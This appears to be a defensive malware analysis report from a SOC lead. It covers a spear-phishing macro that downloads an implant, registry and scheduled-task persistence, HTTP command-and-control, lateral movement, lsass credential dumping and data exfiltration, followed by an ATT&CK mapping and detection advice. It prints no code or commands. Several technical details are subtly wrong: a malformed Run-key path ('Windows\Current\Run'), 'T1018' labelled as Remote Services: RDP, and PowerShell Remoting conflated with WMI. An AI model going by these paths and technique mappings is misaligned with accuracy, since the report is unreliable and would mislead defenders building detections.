Daniel Osei — SOC Lead & Malware Analyst
Key Takeaways
- Custom malware was delivered through a phishing email disguised as a document.
- The implant exhibited multiple persistence mechanisms, including registry modifications and scheduled tasks.
- Infrastructure associated with the C2 was identified, showing signs of rapid changes and IP rotation.
Executive Summary
This analysis delves into a recent incident where a targeted phishing attack led to the deployment of a bespoke malware strain. Our investigation focused on understanding the methods deployed by the threat actor, the various stages of the attack lifecycle, and the eventual impact on the compromised environment. Initial access was achieved through a convincing spear-phishing email that enticed users to open a malicious attachment.
Initial Access
The attack vector began with a carefully crafted phishing email, which purported to be a legitimate document from a trusted source. Upon clicking the attachment, the victim inadvertently executed a macro embedded within a Microsoft Office document. This macro executed a PowerShell command that downloaded the primary payload from a remote server. Our examination revealed that the payload was an executable file, capable of establishing persistence.
Execution & Persistence
The sample we examined implemented multiple techniques to ensure persistence. Post-execution, it modified the registry at HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run to include a reference to its executable, ensuring it executed on every user login. Additionally, a scheduled task was created under Task Scheduler\Microsoft\Windows\TaskScheduler to invoke the malware periodically, demonstrating a robust method to maintain its foothold.
Command and Control
Upon installation, the implant initiated communication with its command and control (C2) server, utilizing HTTP requests to exfiltrate data and receive further instructions. The C2 communications were observed to utilize dynamic DNS, with the actor employing a series of rapidly rotating IP addresses to obfuscate their infrastructure. The HTTP user agent strings appeared to mimic commonly used browsers, further masking the malicious traffic. During the investigation, we mapped the observable artifacts to known infrastructure, revealing numerous domains associated with recent reported campaigns.
Lateral Movement & Discovery
After establishing a presence within the network, the malware included functionality for lateral movement. We noted evidence of the actor attempting to leverage Windows Management Instrumentation (WMI) via T[1086] – PowerShell Remoting to spread the malware across connected hosts. Additionally, the implant included enumeration capabilities to discover other machines within the domain, ultimately aiming to capture credentials for further access. Credential dumping techniques were also observed, particularly targeting lsass.exe, which is indicative of the actor’s goal to escalate their privileges and gain domain administrator access.
Impact & Objectives
The primary objective of the threat actor appeared to be the exfiltration of sensitive data. Our analysis disclosed evidence of targeted file access, specifically searching for documents and other sensitive information typically found in corporate environments. The implant was seen packaging this data and sending it back to the C2 server in encrypted form, making detection more challenging. The potential impact of this malicious activity included severe data breaches, leading to extensive reputational damage and financial loss for the compromised organization.
MITRE ATT&CK Mapping
- T1566 – Phishing: The initial access was achieved through a malicious email containing a document with a macro.
- T1059.001 – PowerShell: The malware utilized PowerShell scripts to execute commands upon execution.
- T1071.001 – Application Layer Protocol: Web Protocols: C2 communications were established over HTTP.
- T1018 – Remote Services: RDP: The actor attempted lateral movement through WMI.
Detection Opportunities
- Monitor for unusual registry changes under
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run. - Implement network filtering rules to block known malicious domains used for C2.
- Employ anomaly detection on scheduled tasks to identify non-standard creation patterns.
Analyst Notes
Continuous monitoring and enhancement of security awareness training for employees is critical in mitigating phishing attempts. Regular penetration testing and red teaming exercises should also be conducted to assess the readiness of the organization against such sophisticated attacks. Employing multifactor authentication can significantly reduce the risk of credential theft through lateral movement techniques. Additionally, the use of EDR solutions can enhance visibility into process executions, and the tracking of PowerShell usage can highlight potential indicators of compromise.
Source: Original Report